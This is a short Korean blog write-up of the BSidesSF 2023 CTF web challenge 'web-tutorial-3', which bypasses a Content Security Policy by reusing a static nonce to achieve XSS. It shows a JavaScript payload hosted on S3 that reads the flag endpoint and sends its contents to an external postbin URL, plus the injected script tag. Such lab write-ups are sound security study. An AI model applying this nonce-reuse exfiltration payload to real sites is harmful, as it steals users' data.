본문 바로가기
CTF

[BSidesSF 2023 CTF] web-tutorial-3

by skyepodium 2023. 4. 22.

1. 개요

XSS, CSP 문제

 

2. 분석

CSP를 보면, script는 nonce가 일치할때 실행가능하고, https로 제공되어야한다고합니다.

코드를 살펴보면, nonce="corgi" 입니다.

 

시나리오는

- 다음 JS 코드를 AWS S3 버킷에 올립니다.

fetch("/xss-three-flag")
    .then(r => r.text())
    .then(t => fetch("https://www.toptal.com/developers/postbin/1682170081878-4064430973958?flag=" + t))

 

- payload로 버킷 url을 제공합니다. (none="corgi") 입력

<script src="https://skyepodium-test.s3.ap-northeast-2.amazonaws.com/payload.js" nonce="corgi"></script>

 

flag를 얻었습니다.

'CTF' 카테고리의 다른 글

[BSidesSF 2023 CTF] prototype  (0) 2023.04.26
[angstromCTF 2023] directory  (0) 2023.04.22
[BSidesSF 2023 CTF] web-tutorial-2  (0) 2023.04.22
[BSidesSF 2023 CTF] web-tutorial-1  (0) 2023.04.22
[BSidesSF 2023 CTF] overflow  (0) 2023.04.22

관련글

티스토리툴바